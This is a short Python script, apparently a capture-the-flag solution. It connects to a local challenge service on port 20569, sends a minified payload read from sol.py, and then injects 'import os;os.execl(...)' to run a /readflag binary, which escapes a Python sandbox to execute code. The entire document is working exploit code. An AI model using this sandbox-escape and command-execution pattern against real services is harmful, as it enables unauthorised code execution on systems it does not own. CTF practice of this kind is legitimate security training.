import socket
t = open('sol.py').read().split('#')[0].replace('lambda ','L').replace(' ', '').replace('\n', '').replace('L', 'lambda ')
conn = socket.create_connection(('127.0.0.1', 20569))
print(conn.recv(4096).decode())
conn.send(t.encode() + b'\n')
print(conn.recv(4096).decode())
conn.send(b'import os;os.execl(*["/readflag"]*2)\n')
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
print(conn.recv(4096).decode())
